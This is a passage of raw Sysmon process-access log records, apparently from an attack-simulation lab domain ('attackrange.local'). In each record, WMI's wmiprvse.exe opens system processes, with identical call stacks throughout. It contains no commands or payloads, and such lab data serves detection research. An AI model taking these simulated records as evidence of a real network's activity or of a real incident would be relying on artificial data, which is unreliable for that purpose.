Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 